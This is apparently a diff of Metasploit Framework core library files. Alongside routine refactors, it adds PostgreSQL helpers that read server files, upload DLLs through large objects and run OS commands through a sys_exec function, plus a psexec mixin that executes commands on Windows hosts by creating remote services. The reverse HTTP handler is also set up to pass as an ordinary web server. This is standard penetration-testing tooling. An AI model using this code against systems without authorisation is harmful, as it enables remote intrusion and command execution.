 
 				raise NoEncodersSucceededError,
 					"#{pinst.refname}: All encoders failed to encode.",

lib/msf/core/encoder.rb

@@ -308,7 +308,12 @@ class Encoder < Module
 			while (offset < state.buf.length)
 				block = state.buf[offset, decoder_block_size]
 
-				state.encoded += encode_block(state,
+				# Append here (String#<<) instead of creating a new string with
+				# String#+ because the allocations kill performance with large
+				# buffers. This isn't usually noticeable on most shellcode, but
+				# when doing stage encoding on meterpreter (~750k bytes) the
+				# difference is 2 orders of magnitude.
+				state.encoded << encode_block(state,
 						block + ("\x00" * (decoder_block_size - block.length)))
 
 				offset += decoder_block_size

lib/msf/core/encoder/xor.rb

@@ -26,6 +26,9 @@ class Msf::Encoder::Xor < Msf::Encoder
 	# Finds keys that are incompatible with the supplied bad character list.
 	#
 	def find_bad_keys(buf, badchars)
+		# Short circuit if there are no badchars
+		return super if badchars.length == 0
+
 		bad_keys = Array.new(decoder_key_size) { Hash.new }
 		byte_idx = 0
 

lib/msf/core/exploit/http/client.rb

@@ -535,6 +535,23 @@ module Exploit::Remote::HttpClient
 		end
 	end
 
+	#
+	# Make sure the URI starts with a slash and doesn't end with one
+	#
+	def normalize_uri(str)
+
+		unless str.to_s[0,1] == "/"
+			str = "/" + str.to_s
+		end
+
+		str = str.gsub(/^\/+/, '/')
+		unless str.length == 1
+			str = str.gsub(/\/+$/, '')
+		end
+
+		str
+	end
+
 	#
 	# Returns the target host
 	#

lib/msf/core/exploit/mysql.rb

@@ -40,16 +40,35 @@ module Exploit::Remote::MYSQL
 		disconnect if self.sock
 		connect
 
-		@mysql_handle = ::RbMysql.connect({
-			:host           => rhost,
-			:port           => rport,
-			:read_timeout   => 300,
-			:write_timeout  => 300,
-			:socket         => sock,
-			:user           => user,
-			:password       => pass,
-			:db             => db
-		})
+		begin
+			@mysql_handle = ::RbMysql.connect({
+				:host           => rhost,
+				:port           => rport,
+				:read_timeout   => 300,
+				:write_timeout  => 300,
+				:socket         => sock,
+				:user           => user,
+				:password       => pass,
+				:db             => db
+			})
+		rescue Errno::ECONNREFUSED
+			print_error("Connection refused")
+			return false
+		rescue RbMysql::ClientError
+			print_error("Connection timedout")
+			return false
+		rescue Errno::ETIMEDOUT
+			print_error("Operation timedout")
+			return false
+		rescue RbMysql::HostNotPrivileged
+			print_error("Unable to login from this host due to policy")
+			return false
+		rescue RbMysql::AccessDeniedError
+			print_error("Access denied")
+			return false
+		end
+
+		return true
 	end
 
 	def mysql_logoff
@@ -62,7 +81,7 @@ module Exploit::Remote::MYSQL
 			res = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
 		rescue Rex::ConnectionTimeout => e
 			print_error("Timeout: #{e.message}")
-			res = nil
+			res = false
 		end
 
 		return res

lib/msf/core/exploit/postgres.rb

@@ -1,4 +1,3 @@
-# -*- coding: binary -*-
 require 'msf/core'
 
 module Msf
@@ -12,11 +11,15 @@ module Msf
 module Exploit::Remote::Postgres
 
 	require 'postgres_msf'
+	require 'base64'
 	include Msf::Db::PostgresPR
+
+	# @!attribute [rw] postgres_conn
+	#   @return [::Msf::Db::PostgresPR::Connection]
 	attr_accessor :postgres_conn
 
 	#
-	# Creates an instance of a MSSQL exploit module.
+	# Creates an instance of a PostgreSQL exploit module.
 	#
 	def initialize(info = {})
 		super
@@ -38,27 +41,66 @@ module Exploit::Remote::Postgres
 		register_autofilter_services(%W{ postgres })
 	end
 
-	# postgres_login takes a number of arguments (defaults to the datastore for
-	# appropriate values), and will either populate self.postgres_conn and return
-	# :connected, or will return :error, :error_databse, or :error_credentials
-	# Fun fact: if you get :error_database, it means your username and password
-	# was accepted (you just failed to guess a correct running database instance).
-	# Note that postgres_login will first trigger postgres_logout if the module
-	# is already connected.
-	def postgres_login(args={})
+	# @!group Datastore accessors
+
+	# Return the datastore value of the same name
+	# @return [String] IP address of the target
+	def rhost; datastore['RHOST']; end
+	# Return the datastore value of the same name
+	# @return [Fixnum] TCP port where the target service is running
+	def rport; datastore['RPORT']; end
+	# Return the datastore value of the same name
+	# @return [String] Username for authentication
+	def username; datastore['USERNAME']; end
+	# Return the datastore value of the same name
+	# @return [String] Password for authentication
+	def password; datastore['PASSWORD']; end
+	# Return the datastore value of the same name
+	# @return [String] Database to connect to when authenticating
+	def database; datastore['DATABASE']; end
+	# Return the datastore value of the same name
+	# @return [Boolean] Whether to print verbose output
+	def verbose; datastore['VERBOSE']; end
+
+	# @!endgroup
+
+	# Takes a number of arguments (defaults to the datastore for appropriate
+	# values), and will either populate {#postgres_conn} and return
+	# +:connected+, or will return +:error+, +:error_databse+, or
+	# +:error_credentials+ in case of an error.
+	#
+	# Fun fact: if you get +:error_database+, it means your username and
+	# password was accepted (you just failed to guess a correct running database
+	# instance).
+	#
+	# @note This method will first call {#postgres_logout} if the module is
+	#   already connected.
+	#
+	# @param opts [Hash] Options for authenticating
+	# @option opts [String] :database The database
+	# @option opts [String] :username The username
+	# @option opts [String] :username The username
+	# @option opts [String] :server IP address or hostname of the target server
+	# @option opts [Fixnum] :port TCP port on :server
+	#
+	# @return [:error_database] if user/pass are correct but database is wrong
+	# @return [:error_credentials] if user/pass are wrong
+	# @return [:error] if some other error occurred
+	# @return [:connected] if everything went as planned
+	def postgres_login(opts={})
 		postgres_logout if self.postgres_conn
-		db = args[:database]       || datastore['DATABASE']
-		username = args[:username] || datastore['USERNAME']
-		password = args[:password] || datastore['PASSWORD']
-		ip = args[:server]         || datastore['RHOST']
-		port = args[:port]         || datastore['RPORT']
+		db = opts[:database]       || datastore['DATABASE']
+		username = opts[:username] || datastore['USERNAME']
+		password = opts[:password] || datastore['PASSWORD']
+		ip = opts[:server]         || datastore['RHOST']
+		port = opts[:port]         || datastore['RPORT']
 		uri = "tcp://#{ip}:#{port}"
-		
+
 		if Rex::Socket.is_ipv6?(ip)
 			uri = "tcp://[#{ip}]:#{port}"
 		end
-		
-		verbose = args[:verbose]   || datastore['VERBOSE']
+
+		verbose = opts[:verbose]   || datastore['VERBOSE']
 		begin
 			self.postgres_conn = Connection.new(db,username,password,uri)
 		rescue RuntimeError => e
@@ -80,7 +122,9 @@ module Exploit::Remote::Postgres
 		end
 	end
 
-	# Logs out of a database instance.
+	# Logs out of a database instance and sets {#postgres_conn} to nil
+	#
+	# @return [void]
 	def postgres_logout
 		ip = datastore['RHOST']
 		port = datastore['RPORT']
@@ -92,20 +136,23 @@ module Exploit::Remote::Postgres
 		print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
 	end
 
-	# If not currently connected, postgres_query will attempt to connect. If an
+	# If not currently connected, attempt to connect. If an
 	# error is encountered while executing the query, it will return with
 	# :error ; otherwise, it will return with :complete.
+	#
+	# @param sql [String] The query to run
+	# @param doprint [Boolean] Whether the result should be printed
+	# @return [Hash]
 	def postgres_query(sql=nil,doprint=false)
 		ip = datastore['RHOST']
 		port = datastore['RPORT']
-		verbose = datastore['VERBOSE']
 		postgres_login unless self.postgres_conn
 		unless self.postgres_conn
 			return {:conn_error => true}
 		end
 		if self.postgres_conn
 			sql ||= datastore['SQL']
-			print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
+			vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
 			begin
 				resp = self.postgres_conn.query(sql)
 			rescue RuntimeError => e
@@ -152,21 +199,26 @@ module Exploit::Remote::Postgres
 		return :complete
 	end
 
-	# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
-	# inferring version number from the failed authentication messages.
+	# Attempts to fingerprint a remote PostgreSQL instance, inferring version
+	# number from the failed authentication messages or simply returning the
+	# result of "select version()" if authentication was successful.
+	#
+	# @return [Hash] A hash containing the version in one of the keys :preauth,
+	#   :auth, or :unkown, depending on how it was determined
+	# @see #postgres_authed_fingerprint
+	# @see #analyze_auth_error
 	def postgres_fingerprint(args={})
-		postgres_logout if self.postgres_conn
+		return postgres_authed_fingerprint if self.postgres_conn
 		db = args[:database]       || datastore['DATABASE']
 		username = args[:username] || datastore['USERNAME']
 		password = args[:password] || datastore['PASSWORD']
-		rhost = args[:server]         || datastore['RHOST']
-		rport = args[:port]         || datastore['RPORT']
-		
+		rhost = args[:server]      || datastore['RHOST']
+		rport = args[:port]        || datastore['RPORT']
+
 		uri = "tcp://#{rhost}:#{rport}"
 		if Rex::Socket.is_ipv6?(rhost)
 			uri = "tcp://[#{rhost}]:#{rport}"
 		end
-		
 
 		verbose = args[:verbose]   || datastore['VERBOSE']
 		begin
@@ -175,16 +227,26 @@ module Exploit::Remote::Postgres
 			version_hash = analyze_auth_error e
 			return version_hash
 		end
-		if self.postgres_conn # Just ask for the version.
-			resp = postgres_query("select version()",false)
-			ver = resp[:complete].rows[0][0]
-			return {:auth => ver}
-		end
+		return postgres_authed_fingerprint if self.postgres_conn
+	end
+
+	# Ask the server what its version is
+	#
+	# @return (see #postgres_fingerprint)
+	# @see #postgres_fingerprint
+	def postgres_authed_fingerprint
+		resp = postgres_query("select version()",false)
+		ver = resp[:complete].rows[0][0]
+		return {:auth => ver}
 	end
 
 	# Matches up filename, line number, and routine with a version.
 	# These all come from source builds of Postgres. TODO: check
 	# in on the binary distros, see if they're different.
+	#
+	# @param e [RuntimeError] The exception raised by Connection.new
+	# @return (see #postgres_fingerprint)
+	# @see #postgres_fingerprint
 	def analyze_auth_error(e)
 		fname,fline,froutine = e.to_s.split("\t")[3,3]
 		fingerprint = "#{fname}:#{fline}:#{froutine}"
@@ -223,14 +285,26 @@ module Exploit::Remote::Postgres
 		when "Fauth.c:L273:Rauth_failed"          ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
 		when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)
 
+		when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
+		when "Fpostinit.c:L709:RInitPostgres"     ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)
+
+		when "Fauth.c:L302:Rauth_failed"          ; return {:preauth => "9.1.6"} # Bad password, good database
+		when "Fpostinit.c:L718:RInitPostgres"     ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
+		when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
+
 		# Windows
 
 		when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed'               ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
 		when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres'     ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
 		when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication'      ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)
+
 		when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication'      ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
 		when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed'               ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)
 
+		when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed'                 ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
+		when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres'       ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
+		when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication'        ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)
+
 		# OpenSolaris (thanks Alexander!)
 
 		when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
@@ -243,6 +317,8 @@ module Exploit::Remote::Postgres
 		end
 	end
 
+	# @return [String] The password as provided by the user or a random one if
+	#   none has been given.
 	def postgres_password
 		if datastore['PASSWORD'].to_s.size > 0
 			datastore['PASSWORD'].to_s
@@ -252,7 +328,7 @@ module Exploit::Remote::Postgres
 	end
 
 	# This presumes the user has rights to both the file and to create a table.
-	# If not, postgre_query() will return an error (usually :sql_error),
+	# If not, {#postgres_query} will return an error (usually :sql_error),
 	# and it should be dealt with by the caller.
 	def postgres_read_textfile(filename)
 		# Check for temp table creation privs first.
@@ -264,9 +340,11 @@ module Exploit::Remote::Postgres
 		read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
 			COPY #{temp_table_name} FROM '#{filename}';
 			SELECT * FROM #{temp_table_name}}
-		read_return = postgres_query(read_query)
+		return postgres_query(read_query,true)
 	end
 
+	# @return [Boolean] Whether the current user has privilege +priv+ on the
+	#   current database
 	def postgres_has_database_privilege(priv)
 		sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
 		ret = postgres_query(sql,false)
@@ -278,8 +356,9 @@ module Exploit::Remote::Postgres
 	end
 
 	# Creates the function sys_exec() in the pg_temp schema.
+	# @deprecated Just get a real shell instead
 	def postgres_create_sys_exec(dll)
-		q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
+		q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
 		resp = postgres_query(q);
 		if resp[:sql_error]
 			print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
@@ -290,7 +369,10 @@ module Exploit::Remote::Postgres
 
 	# This presumes the pg_temp.sys_exec() udf has been installed, almost
 	# certainly by postgres_create_sys_exec()
+	#
+	# @deprecated Just get a real shell instead
 	def postgres_sys_exec(cmd)
+		print_status "Attempting to Execute: #{cmd}"
 		q = "select pg_temp.sys_exec('#{cmd}')"
 		resp = postgres_query(q)
 		if resp[:sql_error]
@@ -300,50 +382,107 @@ module Exploit::Remote::Postgres
 		return true
 	end
 
-	# Takes a local filename and uploads it into a table as a Base64 encoded string.
-	# Returns an array if successful, false if not.
-	def postgres_upload_binary_file(fname)
-		data = postgres_base64_file(fname)
-		tbl,fld = postgres_create_stager_table
-		return false unless data && tbl && fld
-		q = "insert into #{tbl}(#{fld}) values('#{data}')"
-		resp = postgres_query(q)
-		if resp[:sql_error]
-			print_error resp[:sql_error]
-			return false
-		end
-		oid, fout = postgres_write_data_to_disk(tbl,fld)
-		return false unless oid && fout
-		return [tbl,fld,fout,oid]
+
+	# Uploads the given local file to the remote server
+	#
+	# @param fname [String] Name of a file on the local filesystem to be
+	#   uploaded
+	# @param remote_fname (see #postgres_upload_binary_data)
+	# @return (see #postgres_upload_binary_data)
+	def postgres_upload_binary_file(fname, remote_fname=nil)
+		data = File.read(fname)
+		postgres_upload_binary_data(data, remote_fname)
 	end
 
-	# Writes b64 data from a table field, decoded, to disk.
-	def postgres_write_data_to_disk(tbl,fld)
-		oid = rand(60000) + 1000
-		fname = Rex::Text::rand_text_alpha(8) + ".dll"
-		queries = [
-			"select lo_create(#{oid})",
-			"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
-			"select lo_export(#{oid}, '#{fname}')"
-		]
+	# Writes data to disk on the target server.
+	#
+	# This is accomplished in 5 steps:
+	# 1. Create a new object with "select lo_create(-1)"
+	# 2. Delete any resulting rows in pg_largeobject table.
+	#    On 8.x and older, postgres inserts rows as a result of the call to
+	#    lo_create. Deleting them here approximates the state on 9.x where no
+	#    such insert happens.
+	# 3. Break the data into LOBLOCKSIZE-byte chunks.
+	# 4. Insert each of the chunks as a row in pg_largeobject
+	# 5. Select lo_export to write the file to disk
+	#
+	# @param data [String] Raw binary to write to disk
+	# @param remote_fname [String] Name of the file on the remote server where
+	#   the data will be stored. Default is "<random>.dll"
+	# @return [nil] if any part of this process failed
+	# @return [String] if everything went as planned, the name of the file we
+	#   dropped. This is really only useful if +remote_fname+ is nil
+	def postgres_upload_binary_data(data, remote_fname=nil)
+		remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
+
+		# From the Postgres documentation:
+		#   SELECT lo_creat(-1);       -- returns OID of new, empty large object
+		# Doing it this way instead of calling lo_create with a random number
+		# ensures that we don't accidentally hit the id of a real object.
+		resp = postgres_query "select lo_creat(-1)"
+		unless resp and resp[:complete] and resp[:complete].rows[0]
+			print_error "Failed to get a new loid"
+			return
+		end
+
+		oid = resp[:complete].rows[0][0].to_i
+
+		queries = [ "delete from pg_largeobject where loid=#{oid}" ]
+
+		# Break the data into smaller chunks that can fit in the size allowed in
+		# the pg_largeobject data column.
+		# From the postgres documentation:
+		#   "The amount of data per page is defined to be LOBLKSIZE (which is
+		#   currently BLCKSZ/4, or typically 2 kB)."
+		# Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
+		# stick to 2kB.
+		chunks = []
+		while ((c = data.slice!(0..2047)) && c.length > 0)
+			chunks.push c
+		end
+
+		chunks.each_with_index do |chunk, pageno|
+			b64_data = postgres_base64_data(chunk)
+			insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
+			queries.push( "#{insert}"%[oid, pageno, b64_data] )
+		end
+		queries.push "select lo_export(#{oid}, '#{remote_fname}')"
+
+		# Now run each of the queries we just built
 		queries.each do |q|
 			resp = postgres_query(q)
 			if resp && resp[:sql_error]
 				print_error "Could not write the library to disk."
 				print_error resp[:sql_error]
-				break
+				# Can't really recover from this, bail
+				return nil
 			end
 		end
-		return oid,fname
+		return remote_fname
 	end
 
-	# Base64's a file and returns the data.
+	# Calls {#postgres_base64_data} with the contents of file +fname+
+	#
+	# @param fname [String] Name of a file on the local system
+	# @return (see #postgres_base64_data)
 	def postgres_base64_file(fname)
 		data = File.open(fname, "rb") {|f| f.read f.stat.size}
+		postgres_base64_data(data)
+	end
+
+	# Converts data to base64 with no newlines
+	#
+	# @param data [String] Raw data to be base64'd
+	# @return [String] A base64 string suitable for passing to postgresql's
+	#   decode(..., 'base64') function
+	def postgres_base64_data(data)
 		[data].pack("m*").gsub(/\r?\n/,"")
 	end
 
+
 	# Creates a temporary table to store base64'ed binary data in.
+	#
+	# @deprecated No longer necessary since we can insert base64 data directly
 	def postgres_create_stager_table
 		tbl = Rex::Text.rand_text_alpha(8).downcase
 		fld = Rex::Text.rand_text_alpha(8).downcase

lib/msf/core/exploit/psexec.rb

@@ -0,0 +1,201 @@
+require 'msf/core'
+
+module Msf
+
+####
+# This module alows for reuse of the psexec code execution module
+# This code was stolen straight out of psexec.rb.Thanks very much for all
+# who contributed to that module!! Instead of uploading and runing a binary.
+####
+
+module Exploit::Remote::Psexec
+
+	include Msf::Exploit::Remote::DCERPC
+	include Msf::Exploit::Remote::SMB
+
+	# Retrives output from the executed command
+	# @param smbshare [String] The SMBshare to connect to.  Usually C$
+	# @param ip [IP Address] Remote Host to Connect To
+	# @param file [File name] Path to the output file relative to the smbshare
+	#	Example: '\WINDOWS\Temp\outputfile.txt'
+	# @return output or nil if fails
+	def get_output(smbshare, ip, file)
+		begin
+			print_status("Getting the command output...")
+			simple.connect("\\\\#{ip}\\#{smbshare}")
+			outfile = simple.open(file, 'ro')
+			output = outfile.read
+			outfile.close
+			simple.disconnect("\\\\#{ip}\\#{smbshare}")
+			return output
+		rescue StandardError => output_error
+			print_error("Error getting command output. #{output_error.class}. #{output_error}.")
+			return nil
+		end
+	end
+
+
+	# This method executes a single windows command.  If you want to
+	# retrieve the output of your command you'll have to echo it
+	# to a .txt file and then use the get_output method to retrieve it
+	# Make sure to use the cleanup_after method when you are done.
+	# @param command [String] Should be a valid windows command
+	# @return true if everything wen't well
+	def psexec(command)
+
+		simple.connect("IPC$")
+
+		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
+		vprint_status("#{peer} - Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		vprint_status("#{peer} - Bound to #{handle} ...")
+
+		vprint_status("#{peer} - Obtaining a service manager handle...")
+		scm_handle = nil
+		stubdata =
+		NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F)
+		begin
+			response = dcerpc.call(0x0f, stubdata)
+			if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+				scm_handle = dcerpc.last_response.stub_data[0,20]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		servicename = Rex::Text.rand_text_alpha(11)
+		displayname = Rex::Text.rand_text_alpha(16)
+		holdhandle = scm_handle
+		svc_handle = nil
+		svc_status = nil
+
+		stubdata =
+		scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) +
+
+		NDR.long(0x0F01FF) + # Access: MAX
+		NDR.long(0x00000110) + # Type: Interactive, Own process
+		NDR.long(0x00000003) + # Start: Demand
+		NDR.long(0x00000000) + # Errors: Ignore
+		NDR.wstring( command ) +
+		NDR.long(0) + # LoadOrderGroup
+		NDR.long(0) + # Dependencies
+		NDR.long(0) + # Service Start
+		NDR.long(0) + # Password
+		NDR.long(0) + # Password
+		NDR.long(0) + # Password
+		NDR.long(0) # Password
+		begin
+			vprint_status("#{peer} - Creating the service...")
+			response = dcerpc.call(0x0c, stubdata)
+			if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+				svc_handle = dcerpc.last_response.stub_data[0,20]
+				svc_status = dcerpc.last_response.stub_data[24,4]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Closing service handle...")
+		begin
+			response = dcerpc.call(0x0, svc_handle)
+		rescue ::Exception
+		end
+
+		vprint_status("#{peer} - Opening service...")
+		begin
+			stubdata =
+			scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
+
+			response = dcerpc.call(0x10, stubdata)
+			if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+				svc_handle = dcerpc.last_response.stub_data[0,20]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Starting the service...")
+		stubdata =
+		svc_handle + NDR.long(0) + NDR.long(0)
+		begin
+			response = dcerpc.call(0x13, stubdata)
+			if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Removing the service...")
+		stubdata =
+		svc_handle
+		begin
+			response = dcerpc.call(0x02, stubdata)
+			if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+		end
+
+		vprint_status("#{peer} - Closing service handle...")
+		begin
+			response = dcerpc.call(0x0, svc_handle)
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+		end
+
+		select(nil, nil, nil, 1.0)
+		simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
+		return true
+	end
+
+	# This is the cleanup method, removes .txt and .bat file/s created during execution
+	# @param smbshare [String] The SMBshare to connect to.  Usually C$
+	# @param ip [IP Address] Remote Host to Connect To
+	# @param text [File Path] Path to the text file relative to the smbshare
+	#	Example: '\WINDOWS\Temp\output.txt'
+	# @param bat [File Path] Full path to the batch file created
+	#	Example: 'C:\WINDOWS\Temp\batchfile.bat'
+	# @return only in the event of an error
+	def cleanup_after(smbshare, ip, text, bat)
+		begin
+			# Try and do cleanup command/s
+			cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}"
+			print_status("#{peer} - Executing cleanup...")
+			psexec(cleanup)
+			if !check_cleanup(smbshare, ip, text)
+				print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.")
+			else
+				print_status("#{peer} - Cleanup was successful")
+			end
+		rescue StandardError => cleanuperror
+			print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}")
+			print_error("#{peer} - Make sure to manually remove files from the target")
+			return cleanuperror
+		end
+	end
+
+	# Make sure the cleanup command worked
+	# This method should only be called from within cleanup_after
+	def check_cleanup(smbshare, ip, text)
+		simple.connect("\\\\#{ip}\\#{smbshare}")
+		begin
+			if checktext = simple.open(text, 'ro')
+				check = false
+			else
+				check = true
+			end
+			simple.disconnect("\\\\#{ip}\\#{smbshare}")
+			return check
+		rescue StandardError => check_error
+			simple.disconnect("\\\\#{ip}\\#{smbshare}")
+			return true
+		end
+	end
+
+end
+
+end

lib/msf/core/exploit/smtp_deliver.rb

@@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver
 				OptString.new('SUBJECT', [ true, 'Subject line of the email' ]),
 				OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]),
 				OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]),
+				OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']),
 				OptString.new('VERBOSE', [ false, 'Display verbose information' ]),
 			], Msf::Exploit::Remote::SMTPDeliver)
 		register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000])
@@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver
 		print_verbose("Connecting to SMTP server #{rhost}:#{rport}...")
 		nsock = connect(global)
 
-		domain = Rex::Text.rand_text_alpha(rand(32)+1)
+		if datastore['DOMAIN'] and not datastore['DOMAIN'] == ''
+			domain = datastore['DOMAIN']
+		else
+			domain = Rex::Text.rand_text_alpha(rand(32)+1)
+		end
 
 		res = raw_send_recv("EHLO #{domain}\r\n", nsock)
 		if res =~ /STARTTLS/

lib/msf/core/exploit/web.rb

@@ -28,7 +28,7 @@ module Exploit::Remote::Web
 		super
 
 		register_options([
-            OptString.new( 'PATH',    [ true,  'The path to the vulnerable script.', '/' ] ),
+			OptString.new( 'PATH',    [ true,  'The path to the vulnerable script.', '/' ] ),
 			OptString.new( 'GET',     [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
 			OptString.new( 'POST',    [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
 			OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
@@ -75,14 +75,21 @@ module Exploit::Remote::Web
 
 	def exploit
 		print_status "Sending HTTP request for #{path}"
-		if res = perform_request
-      print_status "The server responded with HTTP status code #{res.code}."
-    else
-      print_status 'The server did not respond to our request.'
-    end
+		res = perform_request
+		if res
+			print_status "The server responded with HTTP status code #{res.code}."
+		else
+			print_status 'The server did not respond to our request.'
+		end
 		handler
 	end
 
+	def tries
+		1
+	end
+
+	private
+
 	def perform_request
 		send_request_cgi({
 			'global'    => true,

lib/msf/core/framework.rb

@@ -17,9 +17,9 @@ class Framework
 	#
 
 	Major    = 4
-	Minor    = 5
+	Minor    = 6
 	Point    = 0
-	Release  = "-release"
+	Release  = "-dev"
 
 	if(Point)
 		Version  = "#{Major}.#{Minor}.#{Point}#{Release}"

lib/msf/core/handler/reverse_http.rb

@@ -153,7 +153,9 @@ module ReverseHttp
 				OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
 				OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
 				OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
-				OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
+				OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
+				OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+				OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ])
 			], Msf::Handler::ReverseHttp)
 	end
 
@@ -176,10 +178,17 @@ module ReverseHttp
 			comm = nil
 		end
 
+		# Determine where to bind the HTTP(S) server to
+		bindaddrs = ipv6 ? '::' : '0.0.0.0'
+
+		if not datastore['ReverseListenerBindAddress'].to_s.empty?
+			bindaddrs = datastore['ReverseListenerBindAddress']
+		end
+
 		# Start the HTTPS server service on this host/port
 		self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
 			datastore['LPORT'].to_i,
-			ipv6 ? '::' : '0.0.0.0',
+			bindaddrs,
 			ssl?,
 			{
 				'Msf'        => framework,
@@ -351,7 +360,7 @@ protected
 				print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
 				resp.code    = 200
 				resp.message = "OK"
-				resp.body    = "<h3>No site configured at this address</h3>"
+				resp.body    = datastore['HttpUnknownRequestResponse'].to_s
 		end
 
 		cli.send_response(resp) if (resp)

lib/msf/core/module/deprecated.rb

@@ -0,0 +1,58 @@
+
+module Msf::Module::Deprecated
+
+	# Additional class methods for deprecated modules
+	module ClassMethods
+		# Mark this module as deprecated
+		#
+		# Any time this module is run it will print warnings to that effect.
+		#
+		# @param deprecation_date [Date,#to_s] The date on which this module will
+		#   be removed
+		# @param replacement_module [String] The name of a module that users
+		#   should be using instead of this deprecated one
+		# @return [void]
+		def deprecated(deprecation_date=nil, replacement_module=nil)
+			# Yes, class instance variables.
+			@replacement_module = replacement_module
+			@deprecation_date = deprecation_date
+		end
+
+		# The name of a module that users should be using instead of this
+		# deprecated one
+		#
+		# @return [String,nil]
+		# @see ClassMethods#deprecated
+		def replacement_module; @replacement_module; end
+
+		# The date on which this module will be removed
+		#
+		# @return [Date,nil]
+		# @see ClassMethods#deprecated
+		def deprecation_date; @deprecation_date; end
+	end
+
+	# (see ClassMethods#replacement_module)
+	def replacement_module; self.class.replacement_module; end
